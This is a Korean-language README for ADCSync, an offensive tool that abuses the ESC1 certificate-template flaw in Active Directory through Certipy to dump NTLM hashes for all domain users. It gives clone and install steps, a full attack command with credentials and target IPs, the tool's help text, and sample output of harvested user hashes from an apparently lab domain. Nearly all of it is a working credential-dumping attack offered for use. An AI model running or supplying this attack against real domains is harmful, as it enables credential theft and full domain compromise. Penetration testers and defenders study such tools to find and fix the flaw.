
ESC1을 사용하여 임시 DCSync를 수행하고 해시를 덤프합니다.
이 도구는 ESC1을 활용하여 DCSync를 수행하기 위해 빠르게 제가 만든 도구입니다. 속도는 느리지만 DRSUAPI나 Volume Shadow Copy를 사용하지 않고 임시 DCSync 공격을 수행하는 효과적인 방법을 제공합니다.
이 도구의 첫 번째 버전이며, 기본적으로 도메인의 모든 사용자에 대해 Certipy를 실행하는 과정을 자동화합니다. 아직 개선할 점이 많으며, 향후 인증 방법 및 취약한 템플릿을 자동으로 찾는 프로세스를 자동화하는 기능을 추가할 계획입니다.
python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/
Grabbing user certs:
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00, 1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LOCAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::
ADCSync는 ESC1 익스플로잇을 사용하여 Active Directory 환경의 사용자 계정에서 NTLM 해시를 덤프합니다. 먼저 전달된 Bloodhound 덤프 파일에서 모든 사용자와 도메인을 가져옵니다. 그런 다음 Certipy를 사용하여 각 사용자에 대한 인증서 요청을 만들고 해당 PFX 파일을 인증서 디렉터리에 저장합니다. 마지막으로 Certipy를 사용하여 인증서로 인증하고 각 사용자의 NT 해시를 검색합니다. 이 과정은 상당히 느리며 완료하는 데 시간이 걸릴 수 있지만 NTLM 해시를 덤프하는 대안적인 방법을 제공합니다.
git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt
이 도구를 사용하려면 다음이 필요합니다:
# python3 adcsync.py --help
___ ____ ___________
/ | / __ \/ ____/ ___/__ ______ _____
/ /| | / / / / / \__ \/ / / / __ \/ ___/
/ ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/ |_/_____/\____//____/\__, /_/ /_/\___/
/____/
Usage: adcsync.py [OPTIONS]
Options:
-f, --file TEXT Input User List JSON file from Bloodhound [required]
-o, --output TEXT NTLM Hash Output file [required]
-ca TEXT Certificate Authority [required]
-dc-ip TEXT IP Address of Domain Controller [required]
-u, --user TEXT Username [required]
-p, --password TEXT Password [required]
-template TEXT Template Name vulnerable to ESC1 [required]
-target-ip TEXT IP Address of the target machine [required]
--help Show this message and exit.